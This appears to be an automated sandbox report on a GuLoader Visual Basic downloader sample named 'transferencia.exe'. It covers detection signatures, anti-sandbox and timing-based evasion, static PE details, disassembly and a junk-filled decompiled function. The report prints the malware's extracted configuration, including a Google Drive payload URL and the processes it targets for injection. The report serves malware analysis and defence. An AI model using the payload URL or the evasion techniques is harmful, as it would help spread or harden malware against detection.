Play interactive tour

Edit tour

Analysis Report transferencia

Overview

General Information

Sample Name:	transferencia (renamed file extension from none to exe)
Analysis ID:	395283
MD5:	718116c2cc15e564db71b3bda3f966e5
SHA1:	d14a54807e58e625dc18c6210c08bc553e474d41
SHA256:	573a35a2e7644c067c6ce60c344fbe291be24d85e6cecbee256a37e1219f7a83
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Found potential dummy code loops (likely to delay analysis)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Yara detected VB6 Downloader Generic

Abnormal high CPU Usage

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Detected potential crypto function

Found large amount of non-executed APIs

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

transferencia.exe (PID: 6424 cmdline: 'C:\Users\user\Desktop\transferencia.exe' MD5: 718116C2CC15E564DB71B3BDA3F966E5)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1UJvRluFmYD39H3TjOMIaVwZTdLhauoPu", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: transferencia.exe PID: 6424	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: transferencia.exe PID: 6424	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1UJvRluFmYD39H3TjOMIaVwZTdLhauoPu", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Multi AV Scanner detection for submitted file

Show sources

Source: transferencia.exe	Virustotal: Detection: 46%			Perma Link
Source: transferencia.exe	ReversingLabs: Detection: 34%

Source: transferencia.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1UJvRluFmYD39H3TjOMIaVwZTdLhauoPu

Source: C:\Users\user\Desktop\transferencia.exe

Process Stats: CPU usage > 98%

Source: C:\Users\user\Desktop\transferencia.exe

Code function: 0_2_023051D1 NtProtectVirtualMemory,

0_2_023051D1

Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D8D	0_2_00403D8D
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404A43	0_2_00404A43
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404646	0_2_00404646
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404847	0_2_00404847
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404233	0_2_00404233
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0040443C	0_2_0040443C
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004046C1	0_2_004046C1
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004044C5	0_2_004044C5
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004048D1	0_2_004048D1
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004040BF	0_2_004040BF
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0040474A	0_2_0040474A
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0040454B	0_2_0040454B
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404139	0_2_00404139
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0040433B	0_2_0040433B
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004049C9	0_2_004049C9
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004045CD	0_2_004045CD
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004047D0	0_2_004047D0
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004041B5	0_2_004041B5
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004043B6	0_2_004043B6

Source: transferencia.exe, 00000000.00000000.329335806.0000000000413000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWoodburyt.exe vs transferencia.exe
Source: transferencia.exe	Binary or memory string: OriginalFilenameWoodburyt.exe vs transferencia.exe

Source: transferencia.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal84.troj.evad.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\transferencia.exe

File created: C:\Users\user\AppData\Local\Temp\~DF5CA7D5DF6D4DEBEB.TMP

Jump to behavior

Source: transferencia.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\transferencia.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\transferencia.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: transferencia.exe	Virustotal: Detection: 46%
Source: transferencia.exe	ReversingLabs: Detection: 34%

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia.exe PID: 6424, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: transferencia.exe PID: 6424, type: MEMORY

Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0040EE14 push dword ptr [ebp-08h]; ret	0_2_0040F0A3
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00409A3C push esi; iretd	0_2_00409A58
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00409CD7 push ecx; iretd	0_2_00409D0D
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403CEE push ebp; ret	0_2_00403D38
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00409C9C push ecx; iretd	0_2_00409D0D
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D42 push ebp; ret	0_2_00403D44
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D45 push ebp; ret	0_2_00403D47
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D48 push ebp; ret	0_2_00403D4A
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D4B push ebp; ret	0_2_00403D4D
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D4E push ebp; ret	0_2_00403D50
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D51 push ebp; ret	0_2_00403D53
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D54 push ebp; ret	0_2_00403D56
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D57 push ebp; ret	0_2_00403D59
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D5A push ebp; ret	0_2_00403D5C
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D5D push ebp; ret	0_2_00403D5F
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D60 push ebp; ret	0_2_00403D62
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D63 push ebp; ret	0_2_00403D65
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D66 push ebp; ret	0_2_00403D68
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D69 push ebp; ret	0_2_00403D6B
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D6C push ebp; ret	0_2_00403D6E
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D6F push ebp; ret	0_2_00403D71
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D72 push ebp; ret	0_2_00403D74
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D75 push ebp; ret	0_2_00403D77
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D78 push ebp; ret	0_2_00403D7A
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D7B push ebp; ret	0_2_00403D7D
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D7E push ebp; ret	0_2_00403D80
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0040590E push eax; ret	0_2_0040590F
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D39 push ebp; ret	0_2_00403D3B
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D3C push ebp; ret	0_2_00403D3E
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D3F push ebp; ret	0_2_00403D41
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00408BE3 push ecx; iretd	0_2_00408E85

Source: C:\Users\user\Desktop\transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: transferencia.exe, 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\transferencia.exe

RDTSC instruction interceptor: First address: 00000000023025D2 second address: 00000000023025D2 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007FED9C71556Bh 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007FED9C715551h 0x00000026 cmp dl, bl 0x00000028 push ecx 0x00000029 call 00007FED9C71561Fh 0x0000002e call 00007FED9C71557Bh 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc

Source: C:\Users\user\Desktop\transferencia.exe

Code function: 0_2_02301057 rdtsc

0_2_02301057

Source: C:\Users\user\Desktop\transferencia.exe

API coverage: 8.9 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: transferencia.exe, 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Users\user\Desktop\transferencia.exe

Process Stats: CPU usage > 90% for more than 60s

Source: C:\Users\user\Desktop\transferencia.exe

Code function: 0_2_02301057 rdtsc

0_2_02301057

Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00403D8D mov ebx, dword ptr fs:[00000030h]	0_2_00403D8D
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404233 mov ebx, dword ptr fs:[00000030h]	0_2_00404233
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004040BF mov ebx, dword ptr fs:[00000030h]	0_2_004040BF
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_00404139 mov ebx, dword ptr fs:[00000030h]	0_2_00404139
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_004041B5 mov ebx, dword ptr fs:[00000030h]	0_2_004041B5
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_02301808 mov eax, dword ptr fs:[00000030h]	0_2_02301808
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_02301609 mov eax, dword ptr fs:[00000030h]	0_2_02301609
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_02304474 mov eax, dword ptr fs:[00000030h]	0_2_02304474
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_02304078 mov eax, dword ptr fs:[00000030h]	0_2_02304078
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0230245C mov eax, dword ptr fs:[00000030h]	0_2_0230245C
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_0230115F mov eax, dword ptr fs:[00000030h]	0_2_0230115F
Source: C:\Users\user\Desktop\transferencia.exe	Code function: 0_2_023049B4 mov eax, dword ptr fs:[00000030h]	0_2_023049B4

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: transferencia.exe, 00000000.00000002.851970814.0000000000C70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: transferencia.exe, 00000000.00000002.851970814.0000000000C70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: transferencia.exe, 00000000.00000002.851970814.0000000000C70000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: transferencia.exe, 00000000.00000002.851970814.0000000000C70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\transferencia.exe

Code function: 0_2_0230435E cpuid

0_2_0230435E

Source: C:\Users\user\Desktop\transferencia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection1	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery311	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection1	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Information Discovery121	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
transferencia.exe	46%	Virustotal		Browse
transferencia.exe	34%	ReversingLabs	Win32.Trojan.Vebzenpak

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	395283
Start date:	22.04.2021
Start time:	11:36:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	transferencia (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 28.9% (good quality ratio 12.1%) Quality average: 27.7% Quality standard deviation: 36.2%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.800047430460185
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	transferencia.exe
File size:	86016
MD5:	718116c2cc15e564db71b3bda3f966e5
SHA1:	d14a54807e58e625dc18c6210c08bc553e474d41
SHA256:	573a35a2e7644c067c6ce60c344fbe291be24d85e6cecbee256a37e1219f7a83
SHA512:	84afb3f7d8e1ae4e8431fc755dfc1e434988f2fbfa8b2805715fa5467b9d8e7fae17f40fcd3e82d25bfe6bae8baa28676d3663926ca88536993c3da7b22541ee
SSDEEP:	1536:an2G5PW5XCqdsfBj5Sin0y/AODB80Hn2G5P:j5XCqK9r/AOx
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...e..K.....................0............... ....@................

File Icon


Icon Hash:	b370e4d6f0c44880

Static PE Info

General
Entrypoint:	0x4013ec
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4BC9A565 [Sat Apr 17 12:11:17 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5d12f87c2526f1462e3e55521a60ec88

Entrypoint Preview

Instruction
push 0040C7A0h
call 00007FED9CA44425h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], dl
out BAh, eax
inc edx
hlt
mov bh, 97h
inc esp
mov ah, F2h
mov dh, 3Bh
pop edi
inc edi
dec edx
test dword ptr [eax], 00000000h
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+6Dh], al
bound ebp, dword ptr [ecx+74h]
je 00007FED9CA44497h
jc 00007FED9CA4449Bh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
and al, E5h
push edi
out dx, al
mov cl, dh
pop ebx
daa
inc esi
xchg dh, ch
cmpsd
pop eax
jns 00007FED9CA4445Eh
mov ch, 06h
cmp ah, byte ptr [ebx]
cmp ch, bl
test cl, ah
outsb
dec esi
mov byte ptr [FC9C23C8h], al
xor al, 3Ah
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop eax
mov dl, 00h
add byte ptr [edx], cl
or eax, 09000000h
add byte ptr [ecx+78h], dl
imul ebp, dword ptr [ebx+72h], 00656C73h
or eax, 49000401h
popad
popad
add byte ptr [ecx], bl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x118c4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x100c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x12c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x10de4	0x11000	False	0.37357823989	data	6.53865304618	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x12000	0xad0	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x13000	0x100c	0x2000	False	0.205810546875	data	2.60682974307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x13364	0xca8	data
RT_GROUP_ICON	0x13350	0x14	data
RT_VERSION	0x130f0	0x260	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaLateMemCall, __vbaVarDup, __vbaStrComp, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaVarForNext, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Woodburyt
FileVersion	3.00
CompanyName	Salty
Comments	Salty
ProductName	Salty
ProductVersion	3.00
FileDescription	Salty
OriginalFilename	Woodburyt.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: transferencia.exe PID: 6424 Parent PID: 5996

General

Start time:	11:37:50
Start date:	22/04/2021
Path:	C:\Users\user\Desktop\transferencia.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\transferencia.exe'
Imagebase:	0x400000
File size:	86016 bytes
MD5 hash:	718116C2CC15E564DB71B3BDA3F966E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000000.00000002.852343064.0000000002300000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: transferencia.exe PID: 6424 Parent PID: 5996 transferencia.exeCOMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	47.6%
Signature Coverage:	5.2%
Total number of Nodes:	496
Total number of Limit Nodes:	10

Executed Functions

Function 00403D8D, Relevance: 2.8, APIs: 1, Instructions: 1595
COMMONCrypto

Download Yara Rule

C-Code - Quality: 39%

			E00403D8D(signed char __eax, signed int __ebx, void* __ecx, signed char __edi, void* __esi, void* __fp0) {
				signed char _t231;
				signed char _t232;
				signed char _t233;
				signed char _t234;
				signed char _t235;
				signed char _t236;
				signed char _t237;
				signed char _t238;
				signed char _t239;
				signed char _t240;
				signed char _t241;
				signed char _t242;
				signed char _t243;
				signed char _t246;
				signed char _t247;
				signed char _t249;
				signed int _t304;
				signed int _t305;
				signed int _t307;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				intOrPtr _t313;
				intOrPtr* _t318;
				intOrPtr* _t320;
				intOrPtr* _t322;
				intOrPtr* _t325;
				intOrPtr* _t326;
				intOrPtr* _t328;
				intOrPtr* _t331;
				intOrPtr* _t335;
				intOrPtr* _t336;
				intOrPtr* _t337;
				intOrPtr* _t338;
				void* _t379;
				void* _t396;
				void* _t399;
				intOrPtr _t402;
				intOrPtr _t404;
				intOrPtr _t405;
				intOrPtr _t406;
				intOrPtr _t407;
				intOrPtr _t412;
				intOrPtr _t413;
				intOrPtr _t414;
				intOrPtr _t415;
				signed char _t418;
				signed char _t422;
				signed char _t423;
				signed char _t427;
				signed char _t428;
				signed char _t431;
				signed char _t485;
				intOrPtr* _t510;
				intOrPtr* _t511;
				intOrPtr* _t513;
				intOrPtr* _t514;
				intOrPtr* _t516;
				intOrPtr* _t518;
				intOrPtr* _t519;
				intOrPtr* _t520;
				intOrPtr* _t523;
				intOrPtr* _t525;
				intOrPtr* _t526;
				intOrPtr* _t529;
				intOrPtr* _t530;
				intOrPtr* _t532;
				intOrPtr* _t535;
				intOrPtr* _t537;
				intOrPtr* _t538;
				void* _t552;
				void* _t553;
				void* _t554;
				void* _t555;
				void* _t569;
				intOrPtr _t607;
				intOrPtr _t608;
				void* _t613;

				_t552 = __esi;
				_t485 = __edi;
				_t379 = __ecx;
				_t304 = __ebx;
				_t231 = __eax;
				_pop(_t418);
				_push(_t553);
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
				asm("adc [ebp-0x8], ch");
